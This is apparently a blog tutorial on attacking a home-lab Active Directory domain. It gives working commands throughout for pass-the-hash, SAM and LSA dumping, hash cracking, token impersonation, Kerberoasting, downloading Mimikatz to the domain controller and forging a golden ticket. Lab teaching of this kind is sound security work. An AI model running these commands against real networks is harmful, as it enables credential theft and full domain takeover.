AD Attack Lab Part Four (Pass The Hash, Token Impersonation, Kerberoasting, Mimikatz, and Golden Ticket attacks)
In this post, we will explore the Pass-The-Hash attack, Token Impersonation attack, Kerberoasting attack, Mimikatz attack, and Golden ticket attack in an AD environment. If you haven’t set up the lab yet, follow Part One and Part Two to get your lab setup.
Pass The Hash Attack
The Pass-The-Hash attack essentially is an attack that allows an attacker who has gained a foothold in a network to pass the dumped NTLM hash around. This usually involves an attacker dumped the victim machines NTLM hash and a perform password spraying attack. Let us see how we can perform this attack in our lab environment.
I will use “CrackMapExec” and “psexec.py” from Impacket for the purpose of this lab. If you have not installed Impacket, head over to Part Two and get the Impacket installed on your Kali machine.
Install CrackMapExec
sudo python3 -m pip install pipx
sudo pipx ensurepath
sudo apt-get install python3-venv
sudo pipx install crackmapexec
sudo pipx ensurepath
sudo su
crackmapexec
Pass The Password/Hashes With CrackMapExec
The CrackMapExec allows us to pass the plain-text password to the network to perform a password spraying. We will use the plain-text password for the user “Beauden Wallis” we created early to against the whole network range. The situation here is we assume the credential of the domain user “Beauden Wallis” has been compromised, the attacker is trying to use the credential to see what other workstation or username can be logged in with this set of the password.
crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord!
The “Green Plus” shows with the credential we supplied, the two workstations, and the domain controller all can be accessed. Let’s dump the SAM database and get the hash we need.
crackmapexec smb 192.168.200.0/24 -u bwallis -d KUDOS.local -p P@ssWord! --sam
We can use “psexec.py” to get a SYSTEM shell with the credential we had for domain user “Beauden Wallis”.
psexec.py kudos.local/bwallis:P@ssWord\!@192.168.200.158
The “secretsdump.py” from Impacket can also be used for dumping the SAM database.
secretsdump.py kudos.local/bwallis:P@ssWord\!@192.168.200.156
secretsdump.py kudos.local/bwallis:P@ssWord\!@192.168.200.158
Save the User account hashes into a text file.
Let us see if we can crack the three hashes we obtained with Hashcat.
hashcat -m 1000 hash-crack rockyou.txt --force
We see only one hash was being cracked with wordlist “rockyou.txt”, which is the administrator account’s password. Now, let’s see if we can use the Pass-The-Hash technique on the network to gain access.
crackmapexec smb 192.168.200.0/24 -u calcock -H 924572879ba3b163cc44e0abc5af208a --local-auth
crackmapexec smb 192.168.200.0/24 -u bwallis -H cbe6872995bc342778fc13ce339770ea --local-auth
psexec.py bwallis:@192.168.200.158 -hashes aad3b435b51404eeaad3b435b51404ee:cbe6872995bc342778fc13ce339770eaWe can see “DESKTOP-USER1” is logged in with local user “bwallis” and “DESKTOP-USER2” with user “calcock”. Now, let’s use “psexec.py” to pop a SYSTEM shell.
Token Impersonation Attack
Token impersonation essentially allows an attacker to impersonate another logged-in user on the current session until the next reboot, which means if a domain administrator user is logged-in to a workstation where the attacker has a foothold, the attacker can impersonate the domain administrator and take over the whole network.
Use “windows/smb/psexec” in Metasploit to get a Meterpreter shell on one of the Windows 10 machines.
Load the “incognito” module into the current Meterpreter session.
load incognito
List currently available token for the logged-in accounts.
list_tokens -u
We can impersonate account “bwallis” since it was logged-in.
impersonate_token KUDOS\\bwallis
We can also back to the previous Meterpreter session with “rev2self”. We see we do not have the proper access to dump the SAM database in the impersonated account.
Loggin as the domain administrator, a new administrator token is available for us to impersonate.
Kerberoasting Attack
Kerberoasting Attack allows an attacker to forge or steal a TGS and potentially crack the encryption password offline.
Request a TGS for the SQL service account we set up early. The “GetUserSPNs.py” is from Impacket toolkit.
GetUserSPNs.py kudos.local/bwallis:P@ssWord\! -dc-ip 192.168.200.153 -request
Identify the mode we are going to use to crack the TGS.
hashcat --help | grep Kerb
I have made a wordlist for the purpose of this lab.
Crack the TGS:
hashcat -m 13100 kerb-hash wordlists --force
Mimikatz and Golden Ticket Attack
Mimikatz can perform a wide variety of attacks related to Windows credentials and Kerberos tickets.
Download the Mimikatz to kali then transfer to the Domain Controller.
sudo python -m SimpleHTTPServer 80
certutil.exe -urlcache -f http://192.168.200.160/mimikatz_trunk.zip mimikatz_trunk.zip
Check if we have administrator privilege to run the Mimikatz.
Dumping the logon users’ password.
sekurlsa::logonpasswords
Try to dump the SAM database. We see it doesn’t work since we are not under SYSTEM privilege. In this case, we can use psexec to get a SYSTEM shell and dump the SAM database from there.
lsadump::sam
lsadump::sam /patch
Dumping the SAM with the “lsadump::lsa /patch”.
lsadump::lsa /patch
We can also use the Mimikatz to perform the golden ticket attack with “krbtgt” account, essentially it will give us a command prompt that allows us to access any computers in the domain.
Obtain the credentials for “krbtgt” account:
lsadump::lsa /inject /name:krbtgt
Generate our golden ticket for the current session, note the hashes and SID we obtained when dumping the “krbtgt” account.
kerberos::golden /User:Administrator /domain:kudos.local /sid:S-1-5-21-1510980245-1658837649-3915912440 /krbtgt:91829003942208c879f83073fb387c5f /id:500 /ptt
Open a command prompt contains this TGT, which allows us to access any computers in the domain.
misc::cmd
dir \\DESKTOP-USER2\c$
We examined several interesting attacks against the misconfigured AD environment. In future posts, I will discuss how we can detect these attacks. Thanks for reading :)